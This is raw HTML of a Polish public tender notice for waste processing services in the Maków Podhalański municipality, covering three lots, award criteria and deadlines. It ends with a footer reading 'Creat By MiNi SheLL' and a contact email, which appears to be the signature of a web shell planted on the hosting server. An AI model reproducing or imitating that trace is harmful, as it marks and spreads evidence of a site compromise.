              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
2.zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3.zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4.kopia polisy potwierdzającej, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, potwierdzający spełnienie warunku.
5.wykaz osób, które będą brały bezpośredni udział w realizacji zamówienia przez cały okres obowiązywania umowy, skierowanych przez Wykonawcę, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Dla CZĘŚCI 1  Wykonawca biorący udział w prowadzonym postępowaniu powinien posiadać status regionalnej instalacji do przetwarzania zmieszanych odpadów komunalnych, zgodnie z Uchwałą Sejmiku Województwa Małopolskiego Nr XXV/398/12 z dnia 2 lipca 2012 roku z późn.zm. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego.
Dla CZĘŚCI 2  Wykonawca biorący udział w prowadzonym postępowaniu powinien posiadać status regionalnej instalacji do przetwarzania selektywnie zebranych odpadów zielonych i innych bioodpadów, zgodnie z Uchwałą Sejmiku Województwa Małopolskiego Nr XXV/398/12 z dnia 2 lipca 2012 roku z późn.zm. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego.
Dla CZĘŚCI 3  Wykonawca biorący udział w prowadzonym postępowaniu powinien wykazać, że dysponuje instalacją odzysku i unieszkodliwiania odpadów, spełniającą wymagania określone w przepisach szczegółowych, tj. Ustawy z dnia 14 grudnia 2012 r. o odpadach oraz Ustawa z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach.</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument  ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego. Pełnomocnictwo należy złożyć do oferty w formie oryginału lub notarialnie poświadczonej kopii.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br />nie dotyczy</div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin płatnści</td><td>10</td></tr><tr><td>Koszt przewiezienia odpadów</td><td>25</td></tr><tr><td>Akcja promująca</td><td>5</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy z Wykonawcą w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących sytuacjach:
a.wynagrodzenie  umowne brutto może ulec odpowiedniej zmianie w przypadku zmiany powszechnie obowiązujących przepisów podatku VAT.
b.w innych uzasadnionych okolicznościach, których nie można było przewidzieć w chwili zawarcia umowy.
Zmiana postanowień umowy wymaga formy pisemnej w postaci aneksu pod rygorem nieważności.
Rozwiązanie umowy może nastąpić za porozumieniem stron, w oparciu o Art. 139 ust. 1 Ustawy Prawo zamówień publicznych (Dz. U. z 2015 poz. 2164 ze zm.).
Zamawiający może odstąpić również od zawartej z Wykonawcą umowy na podstawie art. 145 Ustawy Prawo zamówień publicznych (Dz. U. z 2015 poz. 2164 ze zm.).<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 17/11/2016, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Postępowanie prowadzone jest w języku polskim.
Wymagane w SIWZ dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.
Podpisy:osoby wskazane w dokumencie upoważniającym do występowania w obrocie prawnym lub posiadające pełnomocnictwo muszą złożyć podpisy na: wszystkich zapisanych stronach oferty, załącznikach oraz w miejscach, w których oferent naniósł zmiany<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Wykonawca może przed upływem terminu do składania ofert zmienić lub wycofać złożoną ofertę, wówczas należy pisemnie powiadomić o wprowadzeniu zmian lub wycofaniu oferty. Zawiadomienie o wprowadzeniu zmian lub wycofaniu oferty oznakowane będzie wówczas tak samo jak złożona koperta z dopiskiem zmiana lub wycofanie. W przypadku złożenia przez Wykonawcę kompletnej oferty zamiennej  oferta ta powinna posiadać na kopercie oznaczenie kompletna oferta zamienna. W przypadku, gdy Wykonawca chce wykorzystać część dokumentów ze złożonej wcześniej oferty pierwotnej, należy o tym poinformować w zawiadomieniu o wprowadzeniu zmian. W ofercie zamiennej należy wówczas złożyć wszystkie dokumenty, których treść ulega zmianie, opisane na każdej stronie zmiana dokonana w dniu.. oraz spis dokumentów oferty pierwotnej, które stanowić będą z ofertą zamienną kompletną całość. Oferta taka powinna posiadać dopisek na kopercie: oferta zamienna  uzupełnienie. Elementy wykorzystywane z oferty pierwotnej muszą być spójne z ofertą zamienną, w przypadku rozbieżności lub niekompletności, Zamawiający nie będzie traktował tego, jako błąd oczywisty, ale jako błąd dyskwalifikujący ofertę i zarówno oferta pierwotna, jak i zamienna zostaną odrzucone.</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zagospodarowanie zmieszanych odpadów kunalnych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przyjęcie i zagospodarowanie zebranych odpadów komunalnych zmieszanych, selektywnie zebranych odpadów komunalnych, odpadów wielkogabarytowych, odpadów zielonych i innych bioodpadów, pochodzących z terenu Gminy Maków Podhalański należącej zgodnie z Uchwałą Sejmiku Województwa Małopolskiego Nr XXV/398/12 z dnia 2 lipca 2012 r. z późn.zm. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego §14 do obszaru Regionu Południowego województwa małopolskiego. 
Zebrane odpady powinny trafić bezpośrednio do regionalnych instalacji a w przypadku selektywnie zebranych odpadów komunalnych, w ramach zagospodarowania odpadów, do instalacji odzysku i unieszkodliwiania odpadów, spełniającą wymagania określone w przepisach szczegółowych, tj. Ustawa z dnia 14 grudnia 2012 r. o odpadach oraz ustawa z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach., przekazanych Wykonawcy zadania po wstępnej ich analizie przez Zamawiającego za pośrednictwem wyłonionego w innej procedurze przetargowej prowadzonej przez Zamawiającego odbiorcy odpadów komunalnych od nieruchomości mieszkańców z terenu Gminy Maków Podhalański, zarówno zmieszanych odpadów komunalnych jak również odpadów gromadzonych w sposób selektywny w szczególności: papier, metal, tworzywa sztuczne, szkło, opakowania wielomateriałowe oraz odpady komunalne ulegające biodegradacji w tym opakowania ulegające biodegradacji i odpady zielone oraz inne odpady wytworzone w nieruchomości.
Szacunkowa ilość odpadów w rozbiciu na poszczególne frakcje sporządzona została na podstawie własnych analiz opartych o dotychczasową sprawozdawczość oraz własne założenia:
Odpad niesegregowany - zmieszany - 2 600,00 MG
Wielkogabarytowe - 145,00 MG
Dla CZĘŚCI 1  Wykonawca biorący udział w prowadzonym postępowaniu powinien posiadać status regionalnej instalacji do przetwarzania zmieszanych odpadów komunalnych, zgodnie z Uchwałą Sejmiku Województwa Małopolskiego Nr XXV/398/12 z dnia 2 lipca 2012 roku z późn.zm. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90500000-2, 90533000-2,
                    90514000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>10</td></tr><tr><td>Koszt przewiezienia odpadów</td><td>25</td></tr><tr><td>Akcja promująca</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zagospodarowanie odpdów zelonych i innych bioodpadów<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przyjęcie i zagospodarowanie zebranych odpadów komunalnych zmieszanych, selektywnie zebranych odpadów komunalnych, odpadów wielkogabarytowych, odpadów zielonych i innych bioodpadów, pochodzących z terenu Gminy Maków Podhalański należącej zgodnie z Uchwałą Sejmiku Województwa Małopolskiego Nr XXV/398/12 z dnia 2 lipca 2012 r. z późn.zm. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego §14 do obszaru Regionu Południowego województwa małopolskiego. 
Zebrane odpady powinny trafić bezpośrednio do regionalnych instalacji a w przypadku selektywnie zebranych odpadów komunalnych, w ramach zagospodarowania odpadów, do instalacji odzysku i unieszkodliwiania odpadów, spełniającą wymagania określone w przepisach szczegółowych, tj. Ustawa z dnia 14 grudnia 2012 r. o odpadach oraz ustawa z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach., przekazanych Wykonawcy zadania po wstępnej ich analizie przez Zamawiającego za pośrednictwem wyłonionego w innej procedurze przetargowej prowadzonej przez Zamawiającego odbiorcy odpadów komunalnych od nieruchomości mieszkańców z terenu Gminy Maków Podhalański, zarówno zmieszanych odpadów komunalnych jak również odpadów gromadzonych w sposób selektywny w szczególności: papier, metal, tworzywa sztuczne, szkło, opakowania wielomateriałowe oraz odpady komunalne ulegające biodegradacji w tym opakowania ulegające biodegradacji i odpady zielone oraz inne odpady wytworzone w nieruchomości.
Szacunkowa ilość odpadów w rozbiciu na poszczególne frakcje sporządzona została na podstawie własnych analiz opartych o dotychczasową sprawozdawczość oraz własne założenia:
Odpady ulegające biodegradacji	20,00 MG
Dla CZĘŚCI 2  Wykonawca biorący udział w prowadzonym postępowaniu powinien posiadać status regionalnej instalacji do przetwarzania selektywnie zebranych odpadów zielonych i innych bioodpadów, zgodnie z Uchwałą Sejmiku Województwa Małopolskiego Nr XXV/398/12 z dnia 2 lipca 2012 roku z późn.zm. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90500000-2, 90533000-2,
                    90514000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>10</td></tr><tr><td>Koszt przeozu odadów</td><td>25</td></tr><tr><td>Akcja promująca</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zagospodarowanie selektywnie zebranych odpadów omunalnych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przyjęcie i zagospodarowanie zebranych odpadów komunalnych zmieszanych, selektywnie zebranych odpadów komunalnych, odpadów wielkogabarytowych, odpadów zielonych i innych bioodpadów, pochodzących z terenu Gminy Maków Podhalański należącej zgodnie z Uchwałą Sejmiku Województwa Małopolskiego Nr XXV/398/12 z dnia 2 lipca 2012 r. z późn.zm. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego §14 do obszaru Regionu Południowego województwa małopolskiego. 
Zebrane odpady powinny trafić bezpośrednio do regionalnych instalacji a w przypadku selektywnie zebranych odpadów komunalnych, w ramach zagospodarowania odpadów, do instalacji odzysku i unieszkodliwiania odpadów, spełniającą wymagania określone w przepisach szczegółowych, tj. Ustawa z dnia 14 grudnia 2012 r. o odpadach oraz ustawa z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach., przekazanych Wykonawcy zadania po wstępnej ich analizie przez Zamawiającego za pośrednictwem wyłonionego w innej procedurze przetargowej prowadzonej przez Zamawiającego odbiorcy odpadów komunalnych od nieruchomości mieszkańców z terenu Gminy Maków Podhalański, zarówno zmieszanych odpadów komunalnych jak również odpadów gromadzonych w sposób selektywny w szczególności: papier, metal, tworzywa sztuczne, szkło, opakowania wielomateriałowe oraz odpady komunalne ulegające biodegradacji w tym opakowania ulegające biodegradacji i odpady zielone oraz inne odpady wytworzone w nieruchomości.
Szacunkowa ilość odpadów w rozbiciu na poszczególne frakcje sporządzona została na podstawie własnych analiz opartych o dotychczasową sprawozdawczość oraz własne założenia:
Papier,Szkło,Tworzywa sztuczne,Opakowania wielomateriałowe,Metale-400,00 MG
Dla CZĘŚCI 3  Wykonawca biorący udział w prowadzonym postępowaniu powinien wykazać, że dysponuje instalacją odzysku i unieszkodliwiania odpadów, spełniającą wymagania określone w przepisach szczegółowych, tj. Ustawy z dnia 14 grudnia 2012 r. o odpadach oraz Ustawa z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90500000-2, 90533000-2,
                    90514000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>10</td></tr><tr><td>Koszt przewozu odpaów </td><td>25</td></tr><tr><td>Akcja promujca</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com